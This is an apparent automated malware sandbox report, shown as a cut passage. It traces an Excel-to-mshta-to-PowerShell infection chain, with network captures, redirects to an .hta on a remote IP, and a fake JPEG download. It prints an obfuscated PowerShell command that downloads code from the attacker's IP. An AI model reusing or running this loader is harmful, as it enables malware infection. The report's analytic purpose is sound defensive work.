                                                                                            2024-10-25 17:51:05 UTC191INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 32 39 35 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 38 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 32 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 32 34 34 39 36 31 26 63 77 6e 64 3d 32 35 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 31 36 36 34 62 36 30 38 32 35 35 36 61 36 33 38 26 74 73 3d 34 33 38 26 78 3d 30 22 0d 0a 0d 0a
                                                                                            Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1295&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2808&recv_bytes=1027&delivery_rate=2244961&cwnd=251&unsent_bytes=0&cid=1664b6082556a638&ts=438&x=0"
                                                                                            2024-10-25 17:51:05 UTC97INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 34 31 2f 63 65 2f 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 67 6f 6f 64 6e 65 77 73 67 69 76 65 6e 62 79 67 6f 64 74 68 69 6e 67 73 67 72 65 61 74 2e 68 74 61
                                                                                            Data Ascii: Found. Redirecting to http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.2249169188.114.97.34433164C:\Windows\System32\mshta.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-25 17:51:07 UTC469OUTGET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Language: fr-FR
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: qrisni.me
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-25 17:51:08 UTC1213INHTTP/1.1 302 Found
                                                                                            Date: Fri, 25 Oct 2024 17:51:08 GMT
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 97
                                                                                            Connection: close
                                                                                            cross-origin-embedder-policy: require-corp
                                                                                            cross-origin-opener-policy: same-origin
                                                                                            cross-origin-resource-policy: same-origin
                                                                                            x-dns-prefetch-control: off
                                                                                            x-frame-options: SAMEORIGIN
                                                                                            strict-transport-security: max-age=15552000; includeSubDomains
                                                                                            x-download-options: noopen
                                                                                            x-content-type-options: nosniff
                                                                                            origin-agent-cluster: ?1
                                                                                            x-permitted-cross-domain-policies: none
                                                                                            referrer-policy: no-referrer
                                                                                            x-xss-protection: 0
                                                                                            location: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta
                                                                                            vary: Accept, Accept-Encoding
                                                                                            x-do-app-origin: edb1517e-eb68-4bff-8694-91662c34bef1
                                                                                            Cache-Control: private
                                                                                            x-do-orig-status: 302
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V6b4DaVWmI5g15AuW5XVj74%2Bwoh%2FrAVD91DYBEEWy56203550S5dRtz2Y%2BVeqOaMtCIljRlX1%2B4fPJVaQCQARtkzG3eNAO9DtdP0QFHTSUwWyjRZeZn21i%2BAxi0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d840d8addb66b37-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            2024-10-25 17:51:08 UTC191INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 32 32 36 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 39 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 35 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 33 39 37 33 35 30 26 63 77 6e 64 3d 32 35 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 39 33 62 63 37 38 35 65 33 34 30 65 39 61 38 30 26 74 73 3d 35 33 31 26 78 3d 30 22 0d 0a 0d 0a
                                                                                            Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1226&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2809&recv_bytes=1051&delivery_rate=2397350&cwnd=251&unsent_bytes=0&cid=93bc785e340e9a80&ts=531&x=0"
                                                                                            2024-10-25 17:51:08 UTC97INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 37 36 2e 31 34 31 2f 34 31 2f 63 65 2f 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 67 6f 6f 64 6e 65 77 73 67 69 76 65 6e 62 79 67 6f 64 74 68 69 6e 67 73 67 72 65 61 74 2e 68 74 61
                                                                                            Data Ascii: Found. Redirecting to http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.2249173142.250.186.464433804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-25 17:51:27 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                            Host: drive.google.com
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-25 17:51:27 UTC1319INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Fri, 25 Oct 2024 17:51:27 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-k9tZW3rNiYGbxdzwuxB-ag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.2249174142.250.186.1614433804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-25 17:51:28 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-25 17:51:32 UTC4906INHTTP/1.1 200 OK
                                                                                            Content-Type: image/jpeg
                                                                                            Content-Security-Policy: sandbox
                                                                                            Content-Security-Policy: default-src 'none'
                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                            X-Content-Security-Policy: sandbox
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Credentials: false
                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 2239109
                                                                                            Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                            X-GUploader-UploadID: AHmUCY0bmver0urvuxuzo9AdFT_IHz9bwApl778Vv9migfC6rozgTz00TWakirW8DoJgkjup23XFYijIkg
                                                                                            Date: Fri, 25 Oct 2024 17:51:32 GMT
                                                                                            Expires: Fri, 25 Oct 2024 17:51:32 GMT
                                                                                            Cache-Control: private, max-age=0
                                                                                            X-Goog-Hash: crc32c=WqxmdA==
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-10-25 17:51:32 UTC4906INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                            2024-10-25 17:51:32 UTC4887INData Raw: 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70 33 eb
                                                                                            Data Ascii: 8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3
                                                                                            2024-10-25 17:51:32 UTC1378INData Raw: 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66 23 78
                                                                                            Data Ascii: #k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#x
                                                                                            2024-10-25 17:51:32 UTC1378INData Raw: 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4 2b 4a 7a 7d 78 cf 68 ed fb a6 b5 05 45 92 08 be 9c e7 90 d7 c4 9a 5f 11 d4 84 04 02 4b 75 e3 91 ed 81 a1 a2 fb 43 18 3e 5e b2 44 0f c8 de 08 02 fe 20 74 cd 5d 3c cb aa
                                                                                            Data Ascii: @p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve+Jz}xhE_KuC>^D t]<
                                                                                            2024-10-25 17:51:32 UTC1378INData Raw: 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da cc fe 54 1f 66 56 3d cb 1f fb 35 76 ad 81 43 8f fa 67 cc c3 ea a2 5b d3 06 21 bd 54 05 fe b9 f5 2f da 8c 48 e3 ec f0 92 2d 81 7c 35 00 66 61 46 b6 f4 e7 3c 34 12 c7 b4
                                                                                            Data Ascii: '6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(TfV=5vCg[!T/H-|5faF<4
                                                                                            2024-10-25 17:51:32 UTC1378INData Raw: c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6 25 a4 34 3b 58 c8 96 22 d1 f4 52 cb c0 ac d4 44 56 45 f2 d8 8f 46 d3 f1 f8 e6 63 11 a7 d4 37 3c 01 54 7b e0 0e 5d b1 bd 58 06 85 71 f0 c3 94 4f ba 05 25 43 37 3d 31 49
                                                                                            Data Ascii: )XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/%4;X"RDVEFc7<T{]XqO%C7=1I
                                                                                            2024-10-25 17:51:32 UTC1378INData Raw: 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6 e7 81 e9 61 d4 45 28 96 23 21 0c 36 fb 0c 0d 48 75 9a 52 a1 69 48 6f c3 75 57 99 1a f9 8f dd 9d 23 da c0 b7 2c 3a e6 e4 de 1f 02 10 91 32 83 b4 b0 b4 04 03 5d c5 67 99
                                                                                            Data Ascii: 2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,aE(#!6HuRiHouW#,:2]g
                                                                                            2024-10-25 17:51:32 UTC1378INData Raw: a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d e2 57 0c ea 1e ec 37 22 97 bf 40 0d f6 27 0b aa f1 6d 1f 87 c6 22 0e 24 91 46 d1 1c 7f c2 45 8e 4f 6e 95 99 7b 3c 5f c5 90 05 8c 41 a6 6b 62 45 20 6b b2 49 fe 23 77 db
                                                                                            Data Ascii: G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}W7"@'m"$FEOn{<_AkbE kI#w
                                                                                            2024-10-25 17:51:32 UTC1378INData Raw: c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5 28 eb 21 60 ea 41 ef b7 a7 eb 93 02 ed 56 70 f2 1f cb fb 64 b9 67 04 17 60 0f ca f0 10 9d dc 00 a6 82 df 04 1e bf 4c 59 1e 35 d4 ac 80 30 2a c1 a8 f7 ae 72 e4 93 a8 60
                                                                                            Data Ascii: 2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De(!`AVpdg`LY50*r`
                                                                                            2024-10-25 17:51:32 UTC1378INData Raw: 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74 e8 ab 10 1b 49 ef 79 e5 9a 79 e3 05 0b 1b 53 d7 bd e0 7b 2d 3c a8 58 a1 75 0c 0f 17 df 0b a9 9d 9b 4a 51 59 42 a9 e2 bd fd b3 c5 cb aa d5 ee 0f 23 b2 9a e0 91 57 84 83
                                                                                            Data Ascii: 7h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-TtIyyS{-<XuJQYB#W


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:13:50:21
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                            Imagebase:0x13f540000
                                                                                            File size:28'253'536 bytes
                                                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:4
                                                                                            Start time:13:50:45
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                            Imagebase:0x13ff70000
                                                                                            File size:13'824 bytes
                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:13:50:59
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm